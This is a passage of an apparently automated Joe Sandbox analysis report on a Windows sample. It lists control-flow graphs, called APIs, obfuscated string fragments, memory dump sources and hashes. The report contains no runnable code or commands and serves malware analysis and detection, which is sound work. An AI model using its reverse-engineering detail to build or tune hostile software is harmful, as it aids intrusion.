                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 497 419280-4192a4 498 4192b0-4192d7 497->498 498->498 499 4192d9-4192ef 498->499 500 4192f0-419322 499->500 500->500 501 419324-41936a 500->501 502 419370-41938c 501->502 502->502 503 41938e-4193a7 502->503 505 41942a-419435 503->505 506 4193ad-4193b6 503->506 508 419440-41947b 505->508 507 4193c0-4193d9 506->507 507->507 509 4193db-4193ee 507->509 508->508 510 41947d-4194de 508->510 511 4193f0-41941e 509->511 514 4194e4-419515 510->514 515 419906-419932 call 41fe00 GetVolumeInformationW 510->515 511->511 512 419420-419425 511->512 512->505 516 419520-41954d 514->516 520 419934-419938 515->520 521 41993c-41993e 515->521 516->516 518 41954f-419576 SysAllocString 516->518 524 4198f5-419902 518->524 525 41957c-419596 CoSetProxyBlanket 518->525 520->521 523 419950-419957 521->523 526 419970-41998f 523->526 527 419959-419960 523->527 524->515 528 4198eb-4198f1 525->528 529 41959c-4195b4 525->529 531 419990-4199b2 526->531 527->526 530 419962-41996e 527->530 528->524 532 4195c0-41961e 529->532 530->526 531->531 533 4199b4-4199ca 531->533 532->532 535 419620-41969f 532->535 536 4199d0-419a06 533->536 540 4196a0-4196ff 535->540 536->536 537 419a08-419a2e call 3fe960 536->537 543 419a30-419a37 537->543 540->540 542 419701-41972d 540->542 552 419733-419755 542->552 553 4198d6-4198e7 SysFreeString * 2 542->553 543->543 544 419a39-419a4c 543->544 545 419940-41994a 544->545 546 419a52-419a65 call 3e7fd0 544->546 545->523 549 419a6a-419a71 545->549 546->545 555 41975b-41975e 552->555 556 4198cc-4198d2 552->556 553->528 555->556 557 419764-419769 555->557 556->553 557->556 558 41976f-4197b7 557->558 560 4197c0-4197d4 558->560 560->560 561 4197d6-4197e0 560->561 562 4197e4-4197e6 561->562 563 4198bb-4198c8 562->563 564 4197ec-4197f2 562->564 563->556 564->563 565 4197f8-419806 564->565 567 419808-41980d 565->567 568 41983d 565->568 570 41981c-419820 567->570 569 41983f-419877 call 3e7f50 call 3e8e10 568->569 581 4198a7-4198b7 call 3e7f60 569->581 582 419879-41988f 569->582 571 419810 570->571 572 419822-41982b 570->572 577 419811-41981a 571->577 574 419832-419836 572->574 575 41982d-419830 572->575 574->577 578 419838-41983b 574->578 575->577 577->569 577->570 578->577 581->563 582->581 583 419891-41989e 582->583 583->581 586 4198a0-4198a3 583->586 586->581
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00001F7A), ref: 00419550
                                                                                                                                                                                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0041958E
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32 ref: 004198DF
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004198E5
                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 0041992E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                                                                                                                                                                • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                                                                • API String ID: 1773362589-1335595022
                                                                                                                                                                                                                                                                • Opcode ID: a56619464f2f0a5559f399bb9297f8d5da5f8e6bcf96b9177cb9c41d9aca8a62
                                                                                                                                                                                                                                                                • Instruction ID: 248ac51da24458fa8f9de833c7a0c9e7f0f4b74171018b7b455a7edaafc4c61c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a56619464f2f0a5559f399bb9297f8d5da5f8e6bcf96b9177cb9c41d9aca8a62
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB223372A183419BD310CF24C891B9BBBE2EFC5314F28892DE9D49B391D779D845CB86
                                                                                                                                                                                                                                                                Function 003EB100 Relevance: 19.2, Strings: 15, Instructions: 425COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 587 3eb100-3eb18b 588 3eb190-3eb199 587->588 588->588 589 3eb19b-3eb1ae 588->589 591 3eb4be-3eb4c7 589->591 592 3eb52f-3eb538 589->592 593 3eb1bc-3eb3db 589->593 594 3eb40b-3eb40f 589->594 595 3eb4f6-3eb4fd 589->595 596 3eb414-3eb4b7 call 3e7e30 589->596 597 3eb4e4-3eb4ef 589->597 598 3eb1b5-3eb1b7 589->598 602 3eb4ce-3eb4df 591->602 603 3eb4ff-3eb52a call 41fe00 591->603 599 3eb540-3eb56a 592->599 625 3eb3e0-3eb3eb 593->625 600 3eb6d3-3eb6dc 594->600 623 3eb572-3eb592 595->623 596->591 596->592 596->595 596->597 604 3eb65e-3eb668 596->604 605 3eb6fe-3eb710 596->605 606 3eb79f 596->606 607 3eb69c-3eb6b1 596->607 608 3eb717-3eb732 call 41e0a0 596->608 609 3eb5f7-3eb60e call 41fe00 596->609 610 3eb792-3eb79a 596->610 611 3eb6f0-3eb6f1 596->611 612 3eb610-3eb61e 596->612 613 3eb76f 596->613 614 3eb66f-3eb687 call 41fe00 596->614 615 3eb748-3eb76d 596->615 616 3eb789 596->616 617 3eb689-3eb697 596->617 618 3eb647-3eb657 596->618 619 3eb782 596->619 620 3eb5e3-3eb5f0 596->620 621 3eb623-3eb640 596->621 622 3eb780 596->622 597->592 597->595 597->604 597->605 597->606 597->607 597->608 597->609 597->610 597->611 597->612 597->613 597->614 597->615 597->616 597->617 597->618 597->619 597->620 597->621 597->622 624 3eb6df-3eb6e6 598->624 599->599 633 3eb56c-3eb56f 599->633 600->624 630 3eb6c6-3eb6d0 602->630 603->630 604->609 604->612 604->614 604->617 605->606 605->608 605->609 605->612 605->613 605->614 605->615 605->616 605->617 605->619 605->622 631 3eb7a2-3eb7a9 606->631 636 3eb6ba-3eb6bd 607->636 641 3eb737-3eb741 608->641 609->612 610->611 639 3eb6f8 611->639 612->636 628 3eb774-3eb77a 613->628 614->617 615->628 616->610 617->631 618->604 618->605 618->606 618->607 618->608 618->609 618->610 618->611 618->612 618->613 618->614 618->615 618->616 618->617 618->619 618->622 619->616 620->609 620->612 621->604 621->605 621->606 621->607 621->608 621->609 621->610 621->611 621->612 621->613 621->614 621->615 621->616 621->617 621->618 621->619 621->622 634 3eb5a0-3eb5bd 623->634 625->625 627 3eb3ed-3eb3f8 625->627 649 3eb3fb-3eb404 627->649 628->622 630->600 631->636 633->623 634->634 638 3eb5bf-3eb5dc 634->638 636->630 638->604 638->605 638->606 638->607 638->608 638->609 638->610 638->611 638->612 638->613 638->614 638->615 638->616 638->617 638->618 638->619 638->620 638->621 638->622 639->605 641->606 641->609 641->612 641->613 641->614 641->615 641->616 641->617 641->619 641->622 649->591 649->592 649->594 649->595 649->596 649->597 649->604 649->605 649->606 649->607 649->608 649->609 649->610 649->611 649->612 649->613 649->614 649->615 649->616 649->617 649->618 649->619 649->620 649->621 649->622
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
                                                                                                                                                                                                                                                                • API String ID: 0-620192811
                                                                                                                                                                                                                                                                • Opcode ID: eb41bbe8d0230cd015209c9f16a817043c7e27e0231006e4eb593d60d03ab4e0
                                                                                                                                                                                                                                                                • Instruction ID: c44e7e720a2ab27192ce645b98cf2da40d041b254df1e2c8591796694ae6126c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb41bbe8d0230cd015209c9f16a817043c7e27e0231006e4eb593d60d03ab4e0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A0263B0200B41DFD335CF26D891BABBBE1FB49314F408A2CD4AA8BAA0D774A455CF54
                                                                                                                                                                                                                                                                Function 003F1D2B Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 479COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 656 3f1d2b-3f1d43 657 3f1d45-3f1d48 656->657 658 3f1d6b-3f1d99 call 3e1870 657->658 659 3f1d4a-3f1d69 657->659 662 3f1d9b-3f1d9e 658->662 659->657 663 3f1db7-3f1ddb call 3e1870 662->663 664 3f1da0-3f1db5 662->664 667 3f1ddf-3f1de6 663->667 668 3f1ddd-3f1e0c call 3f4850 663->668 664->662 669 3f2428 667->669 676 3f1e0e 668->676 677 3f1e10-3f1e61 call 3e7f50 call 3ea8d0 call 3f4850 668->677 672 3f2715 669->672 673 3f2717-3f2733 call 3e1f30 672->673 682 3ef457-3ef487 call 3e1f40 673->682 683 3ef450-3f2744 673->683 676->677 694 3f1e65-3f1efa call 3e7f50 call 3ea8d0 RtlExpandEnvironmentStrings 677->694 695 3f1e63 677->695 690 3ef489-3ef48c 682->690 692 3ef48e-3ef4ca 690->692 693 3ef4cc-3ef51a call 3e1e30 690->693 692->690 700 3ef51e-3ef522 693->700 701 3ef51c-3ef545 693->701 705 3f1efc-3f1eff 694->705 695->694 700->673 706 3ef549-3ef54c 701->706 707 3f1f36-3f1f4a 705->707 708 3f1f01-3f1f34 705->708 709 3ef54e-3ef5ab 706->709 710 3ef5ad-3ef5fe call 3e1970 706->710 711 3f1f4c-3f1f5f call 3e7f60 707->711 712 3f1f64-3f1f7d 707->712 708->705 709->706 710->672 720 3ef604 710->720 724 3f2426 711->724 715 3f1f7f 712->715 716 3f1f81-3f1fe3 call 3e7f50 712->716 715->716 726 3f200e-3f2039 call 3e7f60 716->726 727 3f1fe5-3f2009 call 3e7f60 * 2 716->727 720->672 724->669 737 3f203b-3f203e 726->737 744 3f2424 727->744 739 3f2057-3f209d call 3e1b80 737->739 740 3f2040-3f2055 737->740 745 3f209f-3f20a2 739->745 740->737 744->724 746 3f20f5-3f2116 call 3e1a80 745->746 747 3f20a4-3f20f3 745->747 750 3f211c-3f2153 call 3e1f30 746->750 751 3f2323-3f23a1 call 3e8b60 call 3ffbf0 746->751 747->745 756 3f2157-3f2177 call 3e7f50 750->756 757 3f2155 750->757 759 3f23a6-3f23b5 call 3e9780 751->759 764 3f2179-3f2182 756->764 765 3f21b1-3f21b3 756->765 757->756 767 3f23b7-3f23cd 759->767 768 3f23f3-3f241f call 3e7f60 * 2 call 3e8c40 759->768 769 3f2184-3f219c call 3f4b40 764->769 766 3f21b5-3f21b7 765->766 771 3f21be-3f21f8 call 3e1f40 766->771 772 3f21b9 766->772 774 3f23cf-3f23d1 767->774 775 3f23e3-3f23ef call 3e7f60 767->775 768->744 782 3f219e 769->782 783 3f21a0-3f21af 769->783 788 3f21fa-3f21fd 771->788 772->751 781 3f23d3-3f23df call 3f4c10 774->781 775->768 794 3f23e1 781->794 782->769 783->765 791 3f21ff-3f222f 788->791 792 3f2231-3f226e call 3e1870 788->792 791->788 799 3f2272-3f2275 792->799 794->775 800 3f2277-3f22c3 799->800 801 3f22c5-3f231e call 3e1870 call 3f4b50 799->801 800->799 801->766
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL ref: 003F1EC3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID: 8$?$L$[$^$a$p$y$|
                                                                                                                                                                                                                                                                • API String ID: 237503144-3949209405
                                                                                                                                                                                                                                                                • Opcode ID: b9d854ff498366573d207222805ac2756b5bf76a1fe7990ab2e42ec3dcf865d9
                                                                                                                                                                                                                                                                • Instruction ID: 7bc9e96acb08b57aef798a79b6d860ac1cf9c64e7c087b56eddc20f486211372
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9d854ff498366573d207222805ac2756b5bf76a1fe7990ab2e42ec3dcf865d9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED129F7560C794CBC3669B38C4913AFBBE1AF85320F194A2EE5D9873C2D63888459B43
                                                                                                                                                                                                                                                                Function 003F1227 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 750COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 807 3f1227-3f123f 808 3f1241-3f1244 807->808 809 3f1246-3f127e 808->809 810 3f1280-3f12ae call 3e1870 808->810 809->808 813 3f12b0-3f12b3 810->813 814 3f12fd-3f1327 call 3e1870 813->814 815 3f12b5-3f12fb 813->815 818 3f132b-3f132f 814->818 819 3f1329-3f1364 call 3f4850 814->819 815->813 820 3f1d26 818->820 827 3f1368-3f13a9 call 3e7f50 call 3ea8d0 819->827 828 3f1366 819->828 822 3f2715 820->822 824 3f2717-3f2733 call 3e1f30 822->824 833 3ef457-3ef487 call 3e1f40 824->833 834 3ef450-3f2744 824->834 840 3f13ab-3f13ae 827->840 828->827 841 3ef489-3ef48c 833->841 842 3f13fa-3f141e call 3e1870 840->842 843 3f13b0-3f13f8 840->843 844 3ef48e-3ef4ca 841->844 845 3ef4cc-3ef51a call 3e1e30 841->845 850 3f1486-3f14b6 call 3f4850 842->850 851 3f1420-3f1459 call 3f4850 842->851 843->840 844->841 852 3ef51e-3ef522 845->852 853 3ef51c-3ef545 845->853 861 3f14ba-3f155f call 3e7f50 call 3ea8d0 RtlExpandEnvironmentStrings 850->861 862 3f14b8 850->862 859 3f145d-3f1481 call 3e7f50 call 3ea8d0 851->859 860 3f145b 851->860 852->824 863 3ef549-3ef54c 853->863 859->850 860->859 876 3f1562-3f1565 861->876 862->861 866 3ef54e-3ef5ab 863->866 867 3ef5ad-3ef5fe call 3e1970 863->867 866->863 867->822 875 3ef604 867->875 875->822 877 3f15ff-3f1615 876->877 878 3f156b-3f15fa 876->878 879 3f162d-3f1646 877->879 880 3f1617-3f1628 call 3e7f60 877->880 878->876 882 3f164a-3f16ac call 3e7f50 879->882 883 3f1648 879->883 880->820 889 3f16ae-3f16d6 call 3e7f60 * 2 882->889 890 3f16db-3f1704 call 3e7f60 882->890 883->882 913 3f1d24 889->913 898 3f1706-3f1709 890->898 900 3f173f-3f175a call 3e1870 898->900 901 3f170b-3f173d 898->901 906 3f175c-3f1788 call 3f4850 900->906 907 3f17b6-3f17d7 900->907 901->898 916 3f178c-3f17b4 call 3e7f50 call 3ea8d0 906->916 917 3f178a 906->917 911 3f17da-3f17dd 907->911 914 3f17df-3f1816 911->914 915 3f1818-3f185e call 3e1b80 911->915 913->820 914->911 922 3f1860-3f1863 915->922 916->907 917->916 923 3f18b8-3f18e5 call 3e1a80 922->923 924 3f1865-3f18b6 922->924 929 3f18ec-3f1930 call 3e1f30 923->929 930 3f18e7 923->930 924->922 935 3f1934-3f194d call 3e7f50 929->935 936 3f1932 929->936 931 3f1bf1-3f1c75 call 3e8b60 call 3f57c0 930->931 940 3f1c7a-3f1c89 call 3e9780 931->940 943 3f196f-3f1975 935->943 944 3f194f-3f1956 935->944 936->935 950 3f1c8b-3f1c9a 940->950 951 3f1cc7-3f1cfa call 3e7f60 * 2 940->951 945 3f1977-3f1979 943->945 947 3f1958-3f1964 call 3f4980 944->947 948 3f197b-3f197f 945->948 949 3f1984-3f19c4 call 3e1f40 945->949 959 3f1966-3f196d 947->959 948->931 964 3f19c6-3f19c9 949->964 954 3f1c9c 950->954 955 3f1cb5-3f1cc5 call 3e7f60 950->955 982 3f1cfc-3f1cff call 3e7f60 951->982 983 3f1d04-3f1d0e 951->983 961 3f1c9e-3f1caf call 3f4b10 954->961 955->951 959->943 972 3f1cb3 961->972 973 3f1cb1 961->973 968 3f1a0e-3f1a55 call 3e1870 964->968 969 3f19cb-3f1a0c 964->969 978 3f1a57-3f1a5a 968->978 969->964 972->955 973->961 980 3f1a5c-3f1a77 978->980 981 3f1a79-3f1ac8 call 3e1870 978->981 980->978 989 3f1aca-3f1acd 981->989 982->983 987 3f1d18-3f1d1f call 3e8c40 983->987 988 3f1d10-3f1d13 call 3e7f60 983->988 987->913 988->987 992 3f1acf-3f1af4 989->992 993 3f1af6-3f1b48 call 3e1b80 989->993 992->989 996 3f1b4a-3f1b4d 993->996 997 3f1b4f-3f1b7a 996->997 998 3f1b7c-3f1bec call 3e1b80 call 3f49a0 996->998 997->996 998->945
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: )$+$>$@$F$L$[$`
                                                                                                                                                                                                                                                                • API String ID: 0-4163809010
                                                                                                                                                                                                                                                                • Opcode ID: 6f285a051fd68880fadedf47e28939981ca8da004b7bb1aa4e7428a3de6de113
                                                                                                                                                                                                                                                                • Instruction ID: 901215d98606e451eecfa9c09a406b319efdad3165cf1d0c43f05530b787c7c2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f285a051fd68880fadedf47e28939981ca8da004b7bb1aa4e7428a3de6de113
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C52BF7260C794CBC725DB38D4943AFBBE1AB95320F198A2EE5D9C73C2D67489418B43
                                                                                                                                                                                                                                                                Function 00418EA0 Relevance: 15.3, Strings: 12, Instructions: 287COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1003 418ea0-418ec3 1004 418ec5-418ec8 1003->1004 1005 418f30-418f50 1004->1005 1006 418eca-418f2e 1004->1006 1007 418f52-418f55 1005->1007 1006->1004 1008 418f57-418fb4 1007->1008 1009 418fb6-418fba 1007->1009 1008->1007 1010 418fbc-418fc7 1009->1010 1011 418fc9 1010->1011 1012 418fcb-418fe4 1010->1012 1013 419036-419039 1011->1013 1014 418fe6 1012->1014 1015 418fe8-418ff3 1012->1015 1018 41903b 1013->1018 1019 41903d-419042 1013->1019 1016 419028-41902d 1014->1016 1015->1016 1017 418ff5-419023 call 41e110 1015->1017 1023 419031-419034 1016->1023 1024 41902f 1016->1024 1017->1016 1018->1019 1020 419264-419271 1019->1020 1021 419048-419068 1019->1021 1025 41906a-41906d 1021->1025 1023->1010 1024->1013 1027 41906f-4190cc 1025->1027 1028 4190ce-4190d2 1025->1028 1027->1025 1029 4190d4-4190df 1028->1029 1030 4190e1 1029->1030 1031 4190e3-4190fc 1029->1031 1032 419160-419163 1030->1032 1033 419100-41910b 1031->1033 1034 4190fe 1031->1034 1035 419165 1032->1035 1036 419167-419171 1032->1036 1037 41914f-419154 1033->1037 1038 41910d-419145 call 41e110 1033->1038 1034->1037 1035->1036 1039 419173 1036->1039 1040 419175-41917d 1036->1040 1042 419156 1037->1042 1043 419158-41915b 1037->1043 1045 41914a 1038->1045 1044 419180-4191a0 1039->1044 1040->1044 1042->1032 1043->1029 1046 4191a2-4191a5 1044->1046 1045->1037 1047 419202-419206 1046->1047 1048 4191a7-419200 1046->1048 1049 419208-41920e 1047->1049 1048->1046 1050 419210 1049->1050 1051 419212-419224 1049->1051 1052 419262 1050->1052 1053 419226 1051->1053 1054 419228-41922e 1051->1054 1052->1020 1055 419256-419259 1053->1055 1054->1055 1056 419230-419252 call 41e110 1054->1056 1057 41925b 1055->1057 1058 41925d-419260 1055->1058 1056->1055 1057->1052 1058->1049
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
